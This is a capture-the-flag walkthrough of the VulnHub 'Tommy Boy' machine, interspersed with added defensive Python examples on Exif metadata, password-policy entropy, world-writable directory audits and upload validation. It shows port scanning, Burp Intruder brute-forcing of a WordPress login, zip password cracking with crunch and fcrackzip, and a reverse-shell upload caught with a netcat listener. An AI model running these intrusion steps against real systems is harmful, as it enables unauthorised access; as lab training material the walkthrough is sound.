[VULNHUB] Tommy Boy: 1

Tommy Boy is an awesome VulnHub VM with an awesome story inside. The objective of this machine is to restore a backup of the Callahan Auto company website and collect 5 flags to unlock a final message. Let’s start!

Flag 1

First of all, scan the target IP with nmap:

nmap 192.168.1.15 -A

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:13 CEST
Nmap scan report for 192.168.1.15
Host is up (0.0027s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
| /6packsofb...soda /lukeiamyourfather 
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds

There are 3 services running on the machine: 2 web servers and SSH. Open 192.168.1.15 in the browser and you will see an error message saying that the backup of the website needs to be restored. Analyzing the source code of the page, I notice these comments:

<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> 
<!--Comment from Richard: Ah! How could I forget?  Thanks-->

There is a hidden company blog stored in a hidden folder whose name has to be guessed by watching the YouTube video linked in the comments. The video is just the phrase “Hey Prehistoric Forest”, so try to open /prehistoricforest. It works, we are in the company blog! Before analyzing it, open /robots.txt, which has the interesting entries nmap reported:

User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt

There are 3 folders containing some images, which I can ignore, and a .txt file: the first flag. Just browse to /flag-numero-uno.txt; the first flag is B34rcl4ws. Now we can analyze the blog.

Flag 2

Open the blog again and start reading the posts. There is a post by richard which is protected by a password that I need to find. The latest post on the blog is a request by Tom Jr. asking richard for the password of that post, and it has a comment; read it:

Hey numbnuts, look at the /richard folder on this server. I’m sure that picture will jog your memory.

Since you have a small brain: see up top in the address bar thingy? Erase “/prehistoricforest” and put “/richard” there instead.

So let’s navigate to /richard and download the image shockedrichard.jpg. I am pretty sure that the password is hidden in the image comment, so I used exiftool to extract it:

./exiftool shockedrichard.jpg

This is the output:

ExifTool Version Number         : 10.24
File Name                       : shockedrichard.jpg
Directory                       : /home/cristiano/Scaricati
File Size                       : 163 kB
File Modification Date/Time     : 2016:08:01 00:15:25+02:00
File Access Date/Time           : 2016:08:01 00:16:30+02:00
File Inode Change Date/Time     : 2016:08:01 00:15:25+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Exif Byte Order                 : Little-endian (Intel, II)
Software                        : Google
Copyright                       : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     : Image::ExifTool 9.97
Rights                          : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Creator Tool                    : Google
Profile CMM Type                : Lino
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : IEC
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : HP
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Current IPTC Digest             : adfc7551120fa16884c295b6d397931f
Envelope Record Version         : 4
Coded Character Set             : UTF8
Application Record Version      : 4
Copyright Notice                : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
IPTC Digest                     : adfc7551120fa16884c295b6d397931f
Image Width                     : 1600
Image Height                    : 1029
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6

The image comment is:

ce154b5a8e59c89732bc25d6a2e6b90b
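To show what exiftool is actually reading here, and why an image published without its metadata stripped is a disclosure channel, the following is a minimal Exif UserComment reader I added for this write-up. It is not exiftool and not part of the original post. It walks the JPEG segments, finds the APP1/Exif block, follows the IFD0 pointer to the Exif sub-IFD and decodes tag 0x9286 (UserComment). The sample JPEG is constructed inside the block; the only value taken from the page is the hash string shown in the exiftool output above.

```python
import struct
import sys

EXIF_IFD_POINTER = 0x8769   # IFD0 tag pointing at the Exif sub-IFD
USER_COMMENT = 0x9286       # Exif tag "UserComment"
# Byte size of each TIFF data type (BYTE, ASCII, SHORT, LONG, RATIONAL, ...)
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8}


def iter_segments(data):
    """Yield (marker, payload) for every JPEG segment before SOS/EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:           # fill byte, skip it
            pos += 1
            continue
        if marker in (0xD9, 0xDA):   # EOI / SOS: all metadata segments precede these
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def read_ifd(tiff, offset, endian):
    """Return {tag: raw_value_bytes} for the IFD at `offset` (relative to the TIFF header)."""
    entries = {}
    (count,) = struct.unpack(endian + "H", tiff[offset:offset + 2])
    for i in range(count):
        e = offset + 2 + 12 * i
        tag, typ, n = struct.unpack(endian + "HHI", tiff[e:e + 8])
        size = TYPE_SIZES.get(typ, 1) * n
        if size <= 4:                # small values are stored inline in the entry
            entries[tag] = tiff[e + 8:e + 8 + size]
        else:                        # otherwise the entry holds an offset to the data
            (off,) = struct.unpack(endian + "I", tiff[e + 8:e + 12])
            entries[tag] = tiff[off:off + size]
    return entries


def extract_user_comment(jpeg_bytes):
    """Return the Exif UserComment as text, or None if the image has none."""
    for marker, payload in iter_segments(jpeg_bytes):
        if marker != 0xE1 or not payload.startswith(b"Exif\x00\x00"):
            continue
        tiff = payload[6:]
        endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
        if endian is None:
            raise ValueError("bad TIFF byte-order mark")
        (ifd0_off,) = struct.unpack(endian + "I", tiff[4:8])
        tags = read_ifd(tiff, ifd0_off, endian)
        if EXIF_IFD_POINTER in tags:
            (exif_off,) = struct.unpack(endian + "I", tags[EXIF_IFD_POINTER][:4])
            tags.update(read_ifd(tiff, exif_off, endian))
        if USER_COMMENT not in tags:
            return None
        raw = tags[USER_COMMENT]
        charset, body = raw[:8], raw[8:]   # first 8 bytes name the character code
        if charset.startswith(b"UNICODE"):
            return body.decode("utf-16-be" if endian == ">" else "utf-16-le", "replace")
        return body.rstrip(b"\x00").decode("ascii", "replace")   # ASCII or undefined


def build_sample_jpeg(comment, endian="<"):
    """Constructed test fixture: a minimal JPEG whose Exif IFD carries `comment`. Not the VM's image."""
    payload = b"ASCII\x00\x00\x00" + comment.encode("ascii")
    ifd0_off = 8                              # right after the 8-byte TIFF header
    exif_off = ifd0_off + 2 + 12 + 4          # IFD0 has one entry plus the next-IFD link
    data_off = exif_off + 2 + 12 + 4          # Exif IFD likewise; comment bytes follow it
    ifd0 = (struct.pack(endian + "H", 1)
            + struct.pack(endian + "HHII", EXIF_IFD_POINTER, 4, 1, exif_off)
            + struct.pack(endian + "I", 0))
    exif = (struct.pack(endian + "H", 1)
            + struct.pack(endian + "HHII", USER_COMMENT, 7, len(payload), data_off)
            + struct.pack(endian + "I", 0))
    order = b"II" if endian == "<" else b"MM"
    tiff = order + struct.pack(endian + "HI", 42, ifd0_off) + ifd0 + exif + payload
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


if __name__ == "__main__":
    # With a path argument read that file; otherwise use the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_sample_jpeg("ce154b5a8e59c89732bc25d6a2e6b90b")
    print("User Comment:", extract_user_comment(data))
```

Run it with a file path to inspect a real image. The practical lesson for anyone publishing images: a UserComment survives re-encoding by many tools, so strip metadata (exiftool -all= is one way) before a picture goes on a web server.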

It seems to be an MD5 hash; look it up with HashKiller and you will find the post password: spanky. Now we can read the post. In a few words, we need to restore the backup of the website by renaming callahanbak.bak, which is located in Big Tom’s SSH account, to index.html. Tom’s SSH user name is in the list of WordPress users, but I don’t have his password. Also, there is an FTP service running on the machine on a port other than the default (21), and this service is unstable: every 15 minutes it goes up and down. The FTP user name of richard is nickburns, but I need to find the password, which seems to be very easy to guess.
Let’s finish analyzing the remaining posts. Notice the first post made on this blog and open its comment:

Well put boss 😉

Flag #2: thisisthesecondflagyayyou.txt

Navigate to /prehistoricforest/thisisthesecondflagyayyou.txt and collect the second flag: Z4l1nsky. Now I can go further.

Flag 3

I focus on the FTP service, so I rescan the IP over the full port range:

nmap 192.168.1.15 -p 1-65535

And now a wild port appears:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:41 CEST
Nmap scan report for 192.168.1.15
Host is up (0.029s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8008/tcp  open  http
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 9.62 seconds

Open an ftp command shell and type:

open 192.168.1.15 65534

Now I use nickburns as the user name, but I need to guess the password, which could be equal to the user name, so try nickburns as the password. Now I am logged into the FTP server; list the files and you will see a readme.txt. Download it:

get readme.txt

Close the ftp shell and read the file:

cat readme.txt

There is a message from Nick saying that there is a /NickIzL33t subfolder somewhere on the server containing an encrypted .zip with all Big Tom’s passwords. Nick also says that that folder can be used as a Dropbox to access files from a phone. There is no such subfolder on 192.168.1.15, but there is another HTTP service listening on port 8008, so navigate to 192.168.1.15:8008 and you will see a simple HTML page by Nick. Browse to /NickIzL33t and another Nick HTML page appears, but there seems to be nothing there. So I try changing my User-Agent to a mobile device (iOS) with Burp Suite as proxy, and when I refresh the page, it changes! There is a message which says:

Gotta know the EXACT name of the .html to break into this fortress.

So it’s time for a brute-force attack. I captured the GET request by refreshing the page with Burp Suite as proxy, then sent it to Intruder with the following payload position:

GET /NickIzL33t/§page§.html HTTP/1.1
Host: 192.168.1.15:8008
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 15 Jul 2016 02:11:27 GMT
If-None-Match: "10e-537a322dc0ba6-gzip"
Cache-Control: max-age=0

I used rockyou.txt as the wordlist and started the attack. After some minutes I found fallon1.html, an HTML page returning response code 200. So I navigate to /NickIzL33t/fallon1.html and the famous page shows up, with a hint:

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD!  
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one 
big chunk ok?  Heh, "big chunk."  A big chunk typing big chunks.  That's funny.

LOL

-Nick

The page holds the 3rd flag, TinyHead, and the encrypted .zip file.

Flag 4

Now I need to decrypt the .zip file, which is protected by a password. Fortunately the password follows a known pattern, so I use crunch to create a custom wordlist:

crunch 13 13 -t bev,%%@@^1995 -o wordlist.txt

Now, to crack the zip password, I use fcrackzip:

fcrackzip -u -v -D -p wordlist.txt t0msp4ssw0rdz.zip

After some minutes I found the password: bevH00tr$1995
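The reason this vault falls so quickly is Nick’s “password requirements” note: a fixed prefix and suffix plus a known alphabet for each of the six middle characters. The crunch pattern above (-t bev,%%@@^1995: , uppercase, % digit, @ lowercase, ^ symbol) encodes exactly that. The block below is an added example, not part of the original post and not crunch itself; it checks a candidate against the policy, counts how many passwords the policy admits, and compares that with a random password of the same length. The symbol alphabet is an assumption (Python’s string.punctuation, 32 characters; crunch’s default symbol set is similar but not identical), so the count can differ slightly from what crunch writes out.

```python
import itertools
import math
import string

# Slots fixed by the hint, in order: bev + [A-Z][0-9][0-9][a-z][a-z][symbol] + 1995.
# The symbol alphabet is an assumption (string.punctuation); crunch's default symbol
# charset differs slightly, so keyspace figures may not match crunch exactly.
PREFIX = "bev"
SUFFIX = "1995"
SLOTS = (
    string.ascii_uppercase,   # one uppercase character
    string.digits,            # two numbers
    string.digits,
    string.ascii_lowercase,   # two lowercase characters
    string.ascii_lowercase,
    string.punctuation,       # one symbol
)
PRINTABLE = len(string.digits + string.ascii_letters + string.punctuation)  # 94


def matches_policy(password, prefix=PREFIX, suffix=SUFFIX, slots=SLOTS):
    """True if `password` is exactly prefix + one character per slot + suffix."""
    if len(password) != len(prefix) + len(slots) + len(suffix):
        return False
    if not (password.startswith(prefix) and password.endswith(suffix)):
        return False
    middle = password[len(prefix):len(prefix) + len(slots)]
    return all(ch in alphabet for ch, alphabet in zip(middle, slots))


def keyspace(slots=SLOTS):
    """Number of passwords the policy admits; the fixed prefix/suffix add nothing."""
    n = 1
    for alphabet in slots:
        n *= len(alphabet)
    return n


def entropy_bits(slots=SLOTS):
    """Effective strength of a policy-conforming password, in bits."""
    return math.log2(keyspace(slots))


def random_entropy_bits(length=13, alphabet_size=PRINTABLE):
    """Bits for a uniformly random password of the same length, for comparison."""
    return length * math.log2(alphabet_size)


def candidates(prefix=PREFIX, suffix=SUFFIX, slots=SLOTS):
    """Lazily enumerate every policy-conforming password, in crunch-like order."""
    for combo in itertools.product(*slots):
        yield prefix + "".join(combo) + suffix


if __name__ == "__main__":
    print("policy keyspace: %d (%.1f bits)" % (keyspace(), entropy_bits()))
    print("random 13-char printable: %.1f bits" % random_entropy_bits())
    print("bevH00tr$1995 fits the policy:", matches_policy("bevH00tr$1995"))
```

Thirteen characters sound strong, but with the structure known the space is about 56 million candidates (under 26 bits), versus roughly 85 bits for a random 13-character password. Composition rules that dictate where each character class goes, combined with a predictable personal prefix and a memorable year, leak most of the entropy; length with free choice of characters (or a passphrase) is what actually resists the wordlist approach used here.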

Unzip the file and open passwords.txt. The interesting section:

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

To find the SSH password I need to get into the WordPress blog, but Big Tom doesn’t seem to remember his username, so I use wpscan to enumerate users:

sudo wpscan -u 192.168.1.15/prehistoricforest --enumerate u

The output:

+----+----------+-------------------+
| Id | Login    | Name              |
+----+----------+-------------------+
| 1  | richard  | richard           |
| 2  | tom      | Big Tom           |
| 3  | tommy    | Tom Jr.           |
| 4  | michelle | Michelle Michelle |
+----+----------+-------------------+

So Big Tom’s username is tom, but I need to find the password. The hint is a famous Queen song, but I think it refers to the rockyou.txt wordlist. So I used Burp Suite to brute-force the login credentials. I intercepted the POST request from /wp-admin with the proxy, then sent the following payload to Intruder:

POST /prehistoricforest/wp-login.php HTTP/1.1
Host: 192.168.1.15
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.15/prehistoricforest/wp-login.php
Cookie: wp-postpass_3604ebf3b5bc65ba9e61d2ca579e65ae=%24P%24B137jyM8khyXYMZ82AEpHgB2Mv9OKi.; wp-settings-time-2=1470085172; wordpress_test_cookie=WP+Cookie+check
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

log=tom&pwd=§password§&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.15%2Fprehistoricforest%2Fwp-admin%2F&testcookie=1

After some minutes I found tom’s login password: tomtom1. It’s time to log in. Open Big Tom’s draft:

Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here:

1938!!

Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

So Big Tom’s SSH user name is bigtommysenior and the password is fatguyinalittlecoat1938!!. Log in with SSH:

ssh bigtommysenior@192.168.1.15

Enter the password and voilà, I am logged in via SSH. List the files and you will notice the 4th flag, which is EditButton, and the backup file. Restore it:

cp callahanbak.bak /var/www/html/index.html

Browsing to /index.html you will see the home page of the website. Now we need to find the last flag, which, according to the 4th one, is in the root of this server at /5.txt.

Flag 5

Going to the root directory and listing the files, I see that I can’t read .5.txt; only the user www-data can, so I need to escalate privileges. Let’s look for directories with special (world-writable) permissions:

find / -perm -2 -type d 2>/dev/null

And an interesting one shows up:

/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads
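The find command above (-perm -2 means “writable by others”) is the same check a hardening audit runs, and the hit it produced is the root cause of what follows: a directory under the web root that every local account, including Big Tom’s SSH user, can write to. The block below is an added example I wrote for this write-up, not part of the original post. It reproduces the audit in Python, with one refinement a practitioner wants: sticky-bit directories such as /tmp are world-writable by design and are skipped by default. The sample directory tree is constructed in a temporary folder.

```python
import os
import stat
import tempfile


def world_writable_dirs(root, skip_sticky=True):
    """Return directories under root (relative paths) that anyone can write to.

    Mirrors `find ROOT -perm -2 -type d`; with skip_sticky=True it also drops
    sticky-bit directories such as /tmp, which are world-writable by design."""
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:                  # unreadable or vanished entry, like 2>/dev/null
                continue
            if not stat.S_ISDIR(st.st_mode):   # symlinks to directories are not audited
                continue
            if st.st_mode & stat.S_IWOTH and not (skip_sticky and st.st_mode & stat.S_ISVTX):
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def make_demo_tree():
    """Constructed sample tree: a 777 upload dir, a 1777 scratch dir and a normal 755 dir."""
    root = tempfile.mkdtemp(prefix="ww-audit-")
    for name, mode in (("uploads", 0o777), ("tmp", 0o1777), ("html", 0o755)):
        path = os.path.join(root, name)
        os.mkdir(path)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = make_demo_tree()
    print("world-writable, non-sticky:", world_writable_dirs(root))
    print("including sticky:", world_writable_dirs(root, skip_sticky=False))
```

Point it at / (as root, so every directory is readable) to get the same list the find command gives. Anything it reports inside a web root, like the uploads folder on this box, should be owned by the web server user with mode 750 or tighter, and ideally live outside the document root altogether.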

Browse to /NickIzL33t/P4TCH_4D4MS on port 8008 (remember to change the User-Agent) and an upload form appears. Upload a PHP reverse shell as a .jpg, then rename the file to .php from the SSH session, since we have access to the /uploads folder there. Listen locally for the incoming connection:

nc -lvp 1234

Then open /NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php and the shell will be spawned in your local terminal. Just get the last flag:

cat .5.txt

Which is: Buttcrack. Now return to the SSH shell, go to Big Tom’s home folder and unzip LOOT.ZIP. It will require a password, which is all the flags put together: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack. The file THE-END.txt will be extracted. Read it. The VM is completely pwned!
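The upload form in the last step accepted a file because its name ended in .jpg, which is the weakest possible check. The block below is an added example of what the server side should have done, written for this write-up and not taken from the VM or the original post: it validates the extension, verifies the content’s magic bytes against that extension, rejects script extensions hidden anywhere in the name and script markers appended to an otherwise valid image, and assigns a server-chosen name so the uploader controls neither the name nor the extension. The sample inputs are constructed; the tiny “JPEG” is just a valid header and trailer.

```python
import os
import secrets

# Magic bytes for the image types we accept; the extension alone proves nothing.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions a web server might hand to an interpreter; reject them anywhere in the name.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "py", "sh"}
# Byte sequences that have no business inside an image (polyglot uploads).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename, content):
    """Check an upload by extension, magic bytes and content; return (ok, reason, stored_name).

    On success stored_name is a random server-chosen name with a normalised
    extension, so the uploader controls neither the name nor the extension."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2:
        return False, "no extension", None
    ext, inner = parts[-1], parts[1:-1]
    if ext not in MAGIC:
        return False, "extension %r not allowed" % ext, None
    if any(p in SCRIPT_EXTENSIONS for p in inner):
        return False, "script extension inside file name", None
    if not any(content.startswith(m) for m in MAGIC[ext]):
        return False, "content does not match %s magic bytes" % ext, None
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "script marker embedded in image data", None
    stored = "%s.%s" % (secrets.token_hex(16), "jpg" if ext == "jpeg" else ext)
    return True, "ok", stored


def sample_files():
    """Constructed inputs: a minimal JPEG, a PHP file disguised as .jpg, a double extension, a polyglot."""
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 14 + b"\xff\xd9"
    return {
        "photo.jpg": jpeg,
        "shell.jpg": b"<?php echo 'not an image'; ?>",
        "shell.php.jpg": jpeg,
        "polyglot.jpg": jpeg + b"<?php echo 'appended'; ?>",
    }


if __name__ == "__main__":
    for name, data in sample_files().items():
        print(name, "->", validate_upload(name, data))
```

Validation alone would not have saved this box, because the rename to .php happened over SSH, not through the form. The second control is the one that matters: store uploads outside the document root, or serve the upload directory with script execution turned off (for Apache with mod_php, php_admin_flag engine off inside a Directory block), and never leave that directory world-writable. Either of those makes a renamed upload an inert file instead of a shell.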
